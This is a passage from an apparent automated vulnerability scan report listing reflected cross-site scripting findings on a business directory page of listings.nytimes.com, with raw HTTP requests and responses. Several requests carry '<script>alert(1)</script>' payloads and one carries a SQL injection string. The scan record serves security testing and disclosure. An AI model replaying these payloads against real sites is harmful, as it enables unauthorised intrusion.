2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91549
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDTSTDT=AKOLPOGAEDMAEGNCHGNMCMNC; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsJ" value="125-566478,125-566482,125-564856,125-565126,125-569444,125-531599,125-550866,125-560171,125-539587,125-5679416c9d1"><script>alert(1)</script>c483ed52a0c37160d">
...[SNIP]...

4.294. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsK parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsK request parameter is copied into the HTML document as plain text between tags. The payload 57cb7<script>alert(1)</script>2f2bae10ebe was submitted in the sLsIdsK parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-52128157cb7<script>alert(1)</script>2f2bae10ebe&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:41:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-52128157cb7<script>alert(1)</script>2f2bae10ebe&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-
...[SNIP]...

4.295. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsK parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsK request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca677"><script>alert(1)</script>848defe0aec5e5e30 was submitted in the sLsIdsK parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281ca677"><script>alert(1)</script>848defe0aec5e5e30&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91521
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADTSTCS=JHIPGLGANGNFMEKOCNFCPGPC; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsK" value="125-566956,125-513013,125-493766,125-521916,125-522018,125-554134,125-521507,125-521264,125-541992,125-521281ca677"><script>alert(1)</script>848defe0aec5e5e30">
...[SNIP]...

4.296. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7feb5"><script>alert(1)</script>4e56d70964fd52a64 was submitted in the sLsIdsL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-5651307feb5"><script>alert(1)</script>4e56d70964fd52a64&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91526
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCBSSQAT=MENKJLNDDBEOMOCHFOFOBHLD; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsL" value="125-557904,125-565259,125-442451,125-551241,125-488296,125-568500,125-569515,125-548226,125-559444,125-5651307feb5"><script>alert(1)</script>4e56d70964fd52a64">
...[SNIP]...

4.297. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsL request parameter is copied into the HTML document as plain text between tags. The payload 4dc70<script>alert(1)</script>4e1eaa7805e was submitted in the sLsIdsL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

